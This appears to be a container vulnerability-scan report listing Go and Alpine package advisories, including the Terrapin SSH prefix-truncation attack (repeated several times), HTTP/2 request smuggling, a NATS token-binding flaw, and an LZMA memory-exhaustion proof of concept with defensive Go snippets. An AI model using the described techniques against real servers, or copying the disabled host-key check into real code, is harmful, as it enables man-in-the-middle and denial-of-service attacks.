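			Ciphers: []string{"aes128-gcm@openssh.com", "aes256-ctr", "aes128-ctr"},
			// Avoid the *-etm@openssh.com MAC variants.
			MACs: []string{"hmac-sha2-256", "hmac-sha2-512"},
		},
		HostKeyCallback: ssh.InsecureIgnoreHostKey(), // do not use in production
	}
	client, err := ssh.Dial("tcp", "example.com:22", cfg)
	if err != nil {
		log.Fatal(err)
	}
	defer client.Close()
}
```

A server built on the same package can apply equivalent lists through ssh.ServerConfig's embedded Config; as the warning above notes, the restriction only helps if both peers cooperate.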
Details
The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable to an arbitrary prefix truncation attack (a.k.a. the Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details see https://terrapin-attack.com.
Impact
This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
|
golang.org/x/text 0.3.7 (golang)
pkg:golang/golang.org/x/text@0.3.7
Missing Release of Resource after Effective Lifetime
| Affected range | <0.3.8 | | Fixed version | 0.3.8 | | CVSS Score | 7.5 | | CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | | EPSS Score | 0.054% | | EPSS Percentile | 17th percentile |
Description
The BCP 47 tag parser has quadratic time complexity due to inherent aspects of its design. Since the parser is, by design, exposed to untrusted user input, this can be leveraged to force a program to consume significant time parsing Accept-Language headers. The parser cannot be easily rewritten to fix this behavior for various reasons. Instead, the fix limits the total complexity of tags passed into ParseAcceptLanguage by capping the number of dashes in the string at 1000. This should be more than enough for the majority of real-world use cases, where the number of tags being sent is likely to be in the single digits.
Specific Go Packages Affected
golang.org/x/text/language
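Until the fixed version is deployed, a caller-side guard can bound the work the parser does. A minimal sketch; the wrapper name and the 1000-byte cap are assumptions for illustration, not part of the library:

```go
package main

import (
	"fmt"
	"net/http"

	"golang.org/x/text/language"
)

// parseAcceptLanguage is a hypothetical wrapper that rejects oversized
// headers before handing them to the quadratic parser.
func parseAcceptLanguage(r *http.Request) ([]language.Tag, error) {
	const maxLen = 1000 // assumed defensive cap
	header := r.Header.Get("Accept-Language")
	if len(header) > maxLen {
		return nil, fmt.Errorf("Accept-Language header too long (%d bytes)", len(header))
	}
	tags, _, err := language.ParseAcceptLanguage(header)
	return tags, err
}
```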
|
golang.org/x/net 0.0.0-20220906165146-f3363e06e74c (golang)
pkg:golang/golang.org/x/net@0.0.0-20220906165146-f3363e06e74c
Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
| Affected range | >=0.0.0-20220524220425-1d687d428aca <0.1.1-0.20221104162952-702349b0e862 | | Fixed version | 0.1.1-0.20221104162952-702349b0e862 | | CVSS Score | 7.5 | | CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H | | EPSS Score | 0.074% | | EPSS Percentile | 23rd percentile |
Description
A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.
Specific Go Packages Affected
golang.org/x/net/http2/h2c
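The affected combination looks roughly like the sketch below: an h2c handler wrapped in http.MaxBytesHandler, where the unconsumed request body can be replayed as attacker-controlled HTTP/2 frames in unfixed versions. Handler body, port, and limit are illustrative assumptions:

```go
package main

import (
	"io"
	"net/http"

	"golang.org/x/net/http2"
	"golang.org/x/net/http2/h2c"
)

func main() {
	inner := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		io.WriteString(w, "hello") // illustrative handler
	})
	// h2c serves HTTP/2 over cleartext TCP on the same port as HTTP/1.
	h2cHandler := h2c.NewHandler(inner, &http2.Server{})
	// Wrapping it in MaxBytesHandler is the pattern the advisory warns
	// about for versions before the fix.
	handler := http.MaxBytesHandler(h2cHandler, 1<<20) // 1 MiB limit, illustrative
	_ = http.ListenAndServe(":8080", handler)
}
```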
|
github.com/nats-io/jwt 1.2.3-0.20210314221642-a826c77dc9d2 (golang)
pkg:golang/github.com/nats-io/jwt@1.2.3-0.20210314221642-a826c77dc9d2
OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
| Affected range | <v2.0.1 | | Fixed version | v2.0.1 | | EPSS Score | 0.290% | | EPSS Percentile | 52nd percentile |
Description
The NATS server provides for Subjects which are namespaced by Account; all Subjects are supposed to be private to an account, with an Export/Import system used to grant cross-account access to some Subjects. Some Exports are public, such that anyone can import the relevant subjects, and some Exports are private, such that the Import requires a token JWT to prove permission. The JWT library's validation of the bindings in the Import Token incorrectly warned on mismatches, instead of outright rejecting the token. As a result, any account can take an Import token used by any other account and re-use it for themselves because the binding to the importing account is not rejected, and use it to import any Subject from the Exporting account, not just the Subject referenced in the Import Token. The NATS account-server system treats account JWTs as semi-public information, such that an attacker can easily enumerate all account JWTs and retrieve all Import Tokens from those account JWTs.
|
musl 1.2.3-r0 (apk)
pkg:apk/alpine/musl@1.2.3-r0?os_name=alpine&os_version=3.16

| Affected range | <1.2.3-r4 | | Fixed version | 1.2.3-r4 | | EPSS Score | 0.016% | | EPSS Percentile | 3rd percentile |
Description
|
golang.org/x/crypto 0.0.0-20220722155217-630584e8d5aa (golang)
pkg:golang/golang.org/x/crypto@0.0.0-20220722155217-630584e8d5aa
Insufficient Verification of Data Authenticity
| Affected range | <0.0.0-20231218163308-9d2ee975ef9f | | Fixed version | 0.0.0-20231218163308-9d2ee975ef9f | | CVSS Score | 5.9 | | CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | | EPSS Score | 55.964% | | EPSS Percentile | 98th percentile |
Description
Summary
Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary number of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex", which alters the SSH handshake to ensure a Man-in-the-Middle attacker can neither introduce unauthenticated messages nor carry sequence number manipulation across handshakes.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable to an arbitrary prefix truncation attack (a.k.a. the Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details see https://terrapin-attack.com.
Impact
This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
|
golang.org/x/crypto 0.0.0-20220926161630-eccd6366d1be (golang)
pkg:golang/golang.org/x/crypto@0.0.0-20220926161630-eccd6366d1be
Insufficient Verification of Data Authenticity
| Affected range | <0.0.0-20231218163308-9d2ee975ef9f | | Fixed version | 0.0.0-20231218163308-9d2ee975ef9f | | CVSS Score | 5.9 | | CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | | EPSS Score | 55.964% | | EPSS Percentile | 98th percentile |
Description
Summary
Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary number of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex", which alters the SSH handshake to ensure a Man-in-the-Middle attacker can neither introduce unauthenticated messages nor carry sequence number manipulation across handshakes.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable to an arbitrary prefix truncation attack (a.k.a. the Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details see https://terrapin-attack.com.
Impact
This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
|
busybox 1.35.0-r17 (apk)
pkg:apk/alpine/busybox@1.35.0-r17?os_name=alpine&os_version=3.16

| Affected range | <1.35.0-r18 | | Fixed version | 1.35.0-r18 | | EPSS Score | 0.024% | | EPSS Percentile | 6th percentile |
Description
|
golang.org/x/crypto 0.0.0-20220829220503-c86fa9a7ed90 (golang)
pkg:golang/golang.org/x/crypto@0.0.0-20220829220503-c86fa9a7ed90
Insufficient Verification of Data Authenticity
| Affected range | <0.0.0-20231218163308-9d2ee975ef9f | | Fixed version | 0.0.0-20231218163308-9d2ee975ef9f | | CVSS Score | 5.9 | | CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | | EPSS Score | 55.964% | | EPSS Percentile | 98th percentile |
Description
Summary
Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary number of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex", which alters the SSH handshake to ensure a Man-in-the-Middle attacker can neither introduce unauthenticated messages nor carry sequence number manipulation across handshakes.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
Details
The SSH specifications of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com MACs) are vulnerable to an arbitrary prefix truncation attack (a.k.a. the Terrapin attack). This allows for an extension negotiation downgrade by stripping the SSH_MSG_EXT_INFO sent after the first message after SSH_MSG_NEWKEYS, downgrading security, and disabling attack countermeasures in some versions of OpenSSH. When targeting Encrypt-then-MAC, this attack requires the use of a CBC cipher to be practically exploitable due to the internal workings of the cipher mode. Additionally, this novel attack technique can be used to exploit previously unexploitable implementation flaws in a Man-in-the-Middle scenario.
The attack works by an attacker injecting an arbitrary number of SSH_MSG_IGNORE messages during the initial key exchange and consequently removing the same number of messages just after the initial key exchange has concluded. This is possible due to missing authentication of the excess SSH_MSG_IGNORE messages and the fact that the implicit sequence numbers used within the SSH protocol are only checked after the initial key exchange.
In the case of ChaCha20-Poly1305, the attack is guaranteed to work on every connection as this cipher does not maintain an internal state other than the message's sequence number. In the case of Encrypt-Then-MAC, practical exploitation requires the use of a CBC cipher; while theoretical integrity is broken for all ciphers when using this mode, message processing will fail at the application layer for CTR and stream ciphers.
For more details see https://terrapin-attack.com.
Impact
This attack targets the specification of ChaCha20-Poly1305 (chacha20-poly1305@openssh.com) and Encrypt-then-MAC (*-etm@openssh.com), which are widely adopted by well-known SSH implementations and can be considered de-facto standard. These algorithms can be practically exploited; however, in the case of Encrypt-Then-MAC, we additionally require the use of a CBC cipher. As a consequence, this attack works against all well-behaving SSH implementations supporting either of those algorithms and can be used to downgrade (but not fully strip) connection security in case SSH extension negotiation (RFC8308) is supported. The attack may also enable attackers to exploit certain implementation flaws in a man-in-the-middle (MitM) scenario.
|
github.com/ulikunitz/xz 0.5.8 (golang)
pkg:golang/github.com/ulikunitz/xz@0.5.8
Allocation of Resources Without Limits or Throttling
| Affected range | <=0.5.13 | | Fixed version | 0.5.14 | | CVSS Score | 5.3 | | CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L | | EPSS Score | 0.058% | | EPSS Percentile | 18th percentile |
Description
Summary
It is possible to put data in front of an LZMA-encoded byte stream without the situation being detected while reading the header. This can lead to increased memory consumption because the current implementation allocates the full decoding buffer directly after reading the header. According to the specification, the LZMA header includes neither a magic number nor a checksum that would allow such an issue to be detected.
Note that the code recognizes the issue later while reading the stream, but at this time the memory allocation has already been done.
Mitigations
The release v0.5.15 includes the following mitigations:
- The ReaderConfig DictCap field is now interpreted as a limit for the dictionary size.
- The default is 2 Gigabytes - 1 byte (2^31-1 bytes).
- Users can check with the Reader.Header method what the actual values are in their LZMA files and set a smaller limit using ReaderConfig (see the sketch after this list).
- The dictionary size will not exceed the larger of the file size and the minimum dictionary size. This is another measure to prevent huge memory allocations for the dictionary.
- The code supports stream sizes only up to a pebibyte (1024^5).
Note that the original v0.5.14 release had a compile error on 32-bit platforms, which was fixed in v0.5.15.
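With the fixed release, the dictionary allocation can be bounded explicitly when constructing a reader. A minimal sketch; the 64 MiB cap and the file name are assumed values for illustration:

```go
package main

import (
	"bufio"
	"io"
	"log"
	"os"

	"github.com/ulikunitz/xz/lzma"
)

func main() {
	f, err := os.Open("archive.lzma") // illustrative file name
	if err != nil {
		log.Fatal(err)
	}
	defer f.Close()

	// In v0.5.15+, DictCap acts as a limit on the dictionary size rather
	// than a fixed up-front allocation, bounding memory for hostile headers.
	cfg := lzma.ReaderConfig{DictCap: 64 << 20} // 64 MiB, assumed cap
	r, err := cfg.NewReader(bufio.NewReader(f))
	if err != nil {
		log.Fatal(err)
	}
	if _, err := io.Copy(io.Discard, r); err != nil {
		log.Fatal(err)
	}
}
```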
Methods affected
Only software that uses lzma.NewReader or lzma.ReaderConfig.NewReader is affected. There is no issue for software using the xz functionality.
I thank @GregoryBuligin for his report, which is provided below.
Summary
When unpacking a large number of LZMA archives, even in a single goroutine, if the first byte of the archive file is 0 (a zero byte added to the beginning), the error "writeMatch: distance out of range" occurs. Memory consumption spikes sharply, and the GC clearly cannot handle this situation.
Details
Judging by the error "writeMatch: distance out of range", the problems occur in the code around this function:
https://github.com/ulikunitz/xz/blob/c8314b8f21e9c5e25b52da07544cac14db277e89/lzma/decoderdict.go#L81
PoC
Run a function similar to the one below in one or more goroutines on a large number of LZMA archives that have a 0 (a zero byte) added to the beginning.
```go
package main

import (
	"bufio"
	"crypto/sha256"
	"encoding/hex"
	"io"
	"os"
	"path/filepath"

	"github.com/ulikunitz/xz/lzma"
)

const (
	ProjectLocalPath = "some/path"
	TmpDir           = "tmp"
	// TmpLZMAPrefix and DirPerm were not defined in the original report;
	// the values below are assumed for illustration.
	TmpLZMAPrefix = "lzma-"
	DirPerm       = 0o755
)

// UnpackLZMA decompresses an LZMA file into a content-addressed location.
func UnpackLZMA(lzmaFile string) error {
	file, err := os.Open(lzmaFile)
	if err != nil {
		return err
	}
	defer file.Close()

	reader, err := lzma.NewReader(bufio.NewReader(file))
	if err != nil {
		return err
	}

	tmpFile, err := os.CreateTemp(TmpDir, TmpLZMAPrefix)
	if err != nil {
		return err
	}
	defer func() {
		tmpFile.Close()
		_ = os.Remove(tmpFile.Name()) // no-op once the file has been renamed
	}()

	// Hash the decompressed stream while writing it to the temp file.
	sha256Hasher := sha256.New()
	multiWriter := io.MultiWriter(tmpFile, sha256Hasher)
	if _, err = io.Copy(multiWriter, reader); err != nil {
		return err
	}

	unpackHash := hex.EncodeToString(sha256Hasher.Sum(nil))
	unpackDir := filepath.Join(ProjectLocalPath, unpackHash[:2])
	_ = os.MkdirAll(unpackDir, DirPerm)

	unpackPath := filepath.Join(unpackDir, unpackHash)
	return os.Rename(tmpFile.Name(), unpackPath)
}
```
Impact
Servers with a small amount of RAM that download and unpack large numbers of unverified LZMA archives are most at risk.
|
google.golang.org/protobuf 1.28.1 (golang)
pkg:golang/google.golang.org/protobuf@1.28.1
Loop with Unreachable Exit Condition ('Infinite Loop')
| Affected range | <1.33.0 | | Fixed version | 1.33.0 | | CVSS Score | 6.6 | | CVSS Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U | | EPSS Score | 0.231% | | EPSS Percentile | 46th percentile |
Description
The protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.
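The trigger conditions can be illustrated with a hedged sketch; the target message type and the malformed JSON input are assumptions for illustration, not taken from the advisory:

```go
package main

import (
	"fmt"

	"google.golang.org/protobuf/encoding/protojson"
	"google.golang.org/protobuf/types/known/structpb"
)

func main() {
	// DiscardUnknown is one of the two conditions the advisory names; the
	// other is unmarshaling into a message containing google.protobuf.Any.
	opts := protojson.UnmarshalOptions{DiscardUnknown: true}

	var msg structpb.Struct // illustrative target message
	// With a vulnerable protobuf version, certain malformed JSON inputs
	// could cause Unmarshal to loop forever; patched versions return an error.
	err := opts.Unmarshal([]byte(`{"bad": }`), &msg)
	fmt.Println(err)
}
```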
|